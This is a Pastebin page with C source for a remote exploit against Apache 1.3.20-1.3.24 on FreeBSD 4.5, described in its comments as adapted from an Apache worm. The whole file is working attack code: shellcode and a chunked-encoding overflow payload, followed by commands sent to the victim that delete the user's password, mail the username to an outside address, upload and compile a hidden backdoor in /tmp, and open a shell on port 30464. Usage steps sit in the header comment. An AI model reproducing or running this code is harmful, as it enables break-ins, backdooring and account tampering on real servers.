API tools faq
paste
Advertisement
FlyFar

Worm.FreeBSD.Block - Source Code

FlyFar
Jul 8th, 2023
527
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.25 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /**************************************************************************
  2.  
  3. Freebsd apache exploit inspirated to me by apache-worm.c
  4. published on http://packetstormsecurity.nl.Here is how it
  5. works:
  6. 1)Get blackhole.c from packetstorm and set it on port 30464.
  7.  Just change it's default port from the source.
  8. 2) Copy it in /tmp/.blackhole.c
  9.  
  10.  cp blackhole.c /tmp/.blackhole.c
  11.  
  12. 3) Check this source,compile it and run it ./apache-ex <Ip>
  13. If everything works fine you will be connected to a shell on 30464,
  14. then use another exploit to get root.
  15.  
  16. If you have any flames and comment send them to me at <nebunu@home.ro>
  17. Also check the worm source too.
  18.  
  19. **************************************************************************/
  20.  
  21.  
  22. #include <stdio.h>
  23. #include <unistd.h>
  24. #include <string.h>
  25. #include <fcntl.h>
  26. #include <stdlib.h>
  27. #include <stdarg.h>
  28. #include <sys/ioctl.h>
  29. #include <sys/types.h>
  30. #include <sys/socket.h>
  31. #include <netinet/in.h>
  32. #include <sys/time.h>
  33. #include <unistd.h>
  34. #include <errno.h>
  35. #include <netdb.h>
  36. #include <arpa/telnet.h>
  37. #include <rpc/rpc.h>
  38. #include <sys/wait.h>
  39. #include <signal.h>
  40.  
  41. int pizda;
  42. #define ASUCCESS         0
  43. #define HOST_PARAM  "Unknown"
  44. #define RET_ADDR_INC    512
  45. #define PADSIZE_1   4
  46. #define PADSIZE_2   5
  47. #define PADSIZE_3   7
  48. #define REP_POPULATOR   24
  49. #define REP_SHELLCODE   24
  50. #define NOPCOUNT    1024
  51. #undef NOP
  52. #define NOP     0x41
  53. #define PADDING_1   'A'
  54. #define PADDING_2   'B'
  55. #define PADDING_3   'C'
  56. #define PUT_STRING(s)   memcpy(p, s, strlen(s)); p += strlen(s);
  57. #define PUT_BYTES(n, b) memset(p, b, n); p += n;
  58. char shellcode[] =
  59.   "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  60.   "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  61.   "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  62.   "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  63.   "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  64.   "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  65.   "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  66.   "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  67.   "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  68.   "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  69.   "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  70.   "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  71.   "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  72.   "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  73.   "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
  74. ;
  75.  
  76. struct {
  77. char *type;
  78. int delta;
  79. u_long retaddr;
  80. int repretaddr;
  81. int repzero;
  82. } targets[] = {
  83.         { "FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)",      -146,  0xbfbfde00,6, 36 },
  84.         { "FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)",   -134,  0xbfbfdb00,3, 36 },
  85. }, victim;
  86.  
  87.  
  88.  
  89. int conectare(char *ip, int port)
  90. {
  91. struct sockaddr_in addr;
  92. int pizda;
  93. pizda = socket(AF_INET, SOCK_STREAM, 0);
  94. if(pizda == -1)
  95. {
  96. perror("socket()");
  97. exit(-1);
  98. }
  99. addr.sin_addr.s_addr = inet_addr(ip);
  100. addr.sin_family = AF_INET;
  101. addr.sin_port = htons(port);
  102. if(connect(pizda,(struct sockaddr *)&addr,sizeof(struct sockaddr_in)) == -1)
  103. return -1;
  104. return(pizda);
  105. }
  106.  
  107.  
  108.  
  109. void pulamea(int pizda)
  110. {
  111. int             n;
  112. char            recvbuf[1024], *cmd = "id; uname -a\n";
  113. fd_set          rset;
  114. send(pizda, cmd, strlen(cmd), 0);
  115. while (1)
  116. {
  117. FD_ZERO(&rset);
  118. FD_SET(pizda, &rset);
  119. FD_SET(STDIN_FILENO, &rset);
  120. select(pizda+1, &rset, NULL, NULL, NULL);
  121. if(FD_ISSET(pizda, &rset))
  122. {
  123. n = read(pizda, recvbuf, 1024);
  124. if (n <= 0)
  125. {
  126. printf("Connection closed by foreign host!\n");
  127. exit(0);
  128. }
  129. recvbuf[n] = 0;
  130. printf("%s", recvbuf);
  131. }
  132. if (FD_ISSET(STDIN_FILENO, &rset))
  133. {
  134. n = read(STDIN_FILENO, recvbuf, 1024);
  135. if (n > 0)
  136. {
  137. recvbuf[n] = 0;
  138. write(pizda, recvbuf, n);
  139. }
  140. }
  141. }
  142. return;
  143. }
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151. void cleanup(char *buf)
  152. {
  153. while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
  154. while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
  155. unsigned long i;
  156. for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
  157. }
  158. }
  159.  
  160.  
  161. char *GetAddress(char *ip) {
  162. struct sockaddr_in sin;
  163. fd_set fds;
  164. int n,d,sock;
  165. char buf[1024];
  166. struct timeval tv;
  167. sock = socket(PF_INET, SOCK_STREAM, 0);
  168. sin.sin_family = PF_INET;
  169. sin.sin_addr.s_addr = inet_addr(ip);
  170. sin.sin_port = htons(80);
  171. if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
  172. write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
  173. tv.tv_sec = 15;
  174. tv.tv_usec = 0;
  175. FD_ZERO(&fds);
  176. FD_SET(sock, &fds);
  177. memset(buf, 0, sizeof(buf));
  178. if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
  179. if(FD_ISSET(sock, &fds))
  180. {
  181. if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
  182. for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
  183. char *start=buf+d+strlen("Server: ");
  184. for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
  185. cleanup(start);
  186. return strdup(start);
  187. }
  188. }
  189. }
  190. return NULL;
  191. }
  192.  
  193. #define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
  194.  
  195. int sendch(int sock,int buf) {
  196. char a[2];
  197. int b=1;
  198. if (buf == '`' || buf == '\\' || buf == '$') {
  199. a[0]='\\';
  200. a[1]=0;
  201. b=write(sock,a,1);
  202. }
  203. if (b <= 0) return b;
  204. a[0]=buf;
  205. a[1]=0;
  206. return write(sock,a,1);
  207. }
  208.  
  209. int writem(int sock, char *str) {
  210. return write(sock,str,strlen(str));
  211. }
  212.  
  213. int encode(int a) {
  214. register int ch, n;
  215. register char *p;
  216. char buf[80];
  217. FILE *in;
  218. if ((in=fopen("/tmp/.blackhole.c","r")) == NULL) return 0;
  219. writem(a,"begin 655 .blackhole.c\n");
  220. while ((n = fread(buf, 1, 45, in))) {
  221. ch = ENC(n);
  222. if (sendch(a,ch) <= ASUCCESS) break;
  223. for (p = buf; n > 0; n -= 3, p += 3) {
  224. if (n < 3)
  225. {
  226. p[2] = '\0';
  227. if (n < 2) p[1] = '\0';
  228. }
  229. ch = *p >> 2;
  230. ch = ENC(ch);
  231. if (sendch(a,ch) <= ASUCCESS) break;
  232. ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
  233. ch = ENC(ch);
  234. if (sendch(a,ch) <= ASUCCESS) break;
  235. ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
  236. ch = ENC(ch);
  237. if (sendch(a,ch) <= ASUCCESS) break;
  238. ch = p[2] & 077;
  239. ch = ENC(ch);
  240. if (sendch(a,ch) <= ASUCCESS) break;
  241. }
  242. ch='\n';
  243. if (sendch(a,ch) <= ASUCCESS) break;
  244. usleep(10);
  245. }
  246. if (ferror(in)) {
  247. fclose(in);
  248. return 0;
  249. }
  250. ch = ENC('\0');
  251. sendch(a,ch);
  252. ch = '\n';
  253. sendch(a,ch);
  254. writem(a,"end\n");
  255. if (in) fclose(in);
  256. return 1;
  257. }
  258.  
  259. void exploit(char *ip) {
  260. char *a=GetAddress(ip);
  261. int l,sock;
  262. struct sockaddr_in sin;
  263. if (a == NULL) exit(0);
  264. if (strncmp(a,"Apache",6)) exit(0);
  265. free(a);
  266. alarm(60);
  267. for (l=0;l<2;l++) {
  268. u_char buf[512], *expbuf=0, *p=0;
  269. int i=0, j=0, responses=0;
  270. memcpy(&victim, &targets[l], sizeof(victim));
  271. sock = socket(PF_INET, SOCK_STREAM, 0);
  272. sin.sin_family = PF_INET;
  273. sin.sin_addr.s_addr = inet_addr(ip);
  274. sin.sin_port = htons(80);
  275. if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1);
  276. p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
  277. PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
  278. for (i = 0; i < REP_SHELLCODE; i++) {
  279. PUT_STRING("X-");
  280. PUT_BYTES(PADSIZE_3, PADDING_3);
  281. PUT_STRING(": ");
  282. PUT_BYTES(NOPCOUNT, NOP);
  283. memcpy(p, shellcode, sizeof(shellcode) - 1);
  284. p += sizeof(shellcode) - 1;
  285. PUT_STRING("\r\n");
  286. }
  287. for (i = 0; i < REP_POPULATOR; i++) {
  288. PUT_STRING("X-");
  289. PUT_BYTES(PADSIZE_1, PADDING_1);
  290. PUT_STRING(": ");
  291. for (j = 0; j < victim.repretaddr; j++) {
  292. *p++ = victim.retaddr & 0xff;
  293. *p++ = (victim.retaddr >> 8) & 0xff;
  294. *p++ = (victim.retaddr >> 16) & 0xff;
  295. *p++ = (victim.retaddr >> 24) & 0xff;
  296. }
  297. PUT_BYTES(victim.repzero, 0);
  298. PUT_STRING("\r\n");
  299. }
  300. PUT_STRING("Transfer-Encoding: chunked\r\n");
  301. snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
  302. PUT_STRING(buf);
  303. PUT_BYTES(PADSIZE_2, PADDING_2);
  304. snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
  305. PUT_STRING(buf);
  306. write(sock, expbuf, p - expbuf);
  307. responses = 0;
  308. while (1) {
  309. fd_set fds;
  310. int n;
  311. struct timeval  tv;
  312. tv.tv_sec = 15;
  313. tv.tv_usec = 0;
  314. FD_ZERO(&fds);
  315. FD_SET(sock, &fds);
  316. memset(buf, 0, sizeof(buf));
  317. if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) {
  318. if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break;
  319. if(n >= 1)
  320. {
  321. for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0;
  322. if(responses >= 2) {
  323. write(sock,"O",1);
  324. alarm(3600);
  325. sleep(10);
  326. writem(sock,"\npasswd -d `whoami`;echo `whoami` | mail email@youraddress.com\n");
  327. writem(sock,"\nrm -rf /tmp/.blackhole.c;cat > /tmp/.uublackhole << __eof__;\n");
  328. encode(sock);
  329. writem(sock,"__eof__\n");
  330. sprintf(buf,"/usr/bin/uudecode -o /tmp/.blackhole.c /tmp/.uublackhole;gcc -o /tmp/.blackhole /tmp/.blackhole.c;chmod +x /tmp/.blackhole;/tmp/.blackhole;exit;\n");
  331. writem(sock,buf);
  332. while(read(sock,buf,1024)>=0);
  333. exit(0);
  334. }
  335. }
  336. }
  337. }
  338. free(expbuf);
  339. close(sock);
  340. }
  341. return;
  342. }
  343.  
  344.  
  345. main(int argc,char **argv[])
  346.  
  347. {
  348. if (argc!=2)
  349. {
  350. printf("AVAILABLE TARGETS:\n
  351. 1)   FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)      
  352. 2)   FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
  353.  
  354.  
  355.  Adapted after a apache worm by
  356.  nebunu <nebunu@home.ro>
  357.  
  358.  Usage: ./apache-ex <IP>
  359. \n\n");
  360. exit(0);
  361. }
  362. printf("Exploiting %s , nebunu rulez!\n..",argv[1]);
  363. exploit(argv[1]);
  364. sleep(3);
  365. printf("Connecting to shell on port 30464\n...");
  366. pizda=conectare(argv[1],30464);
  367. pulamea(pizda);
  368. }
Tags: freebsd worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!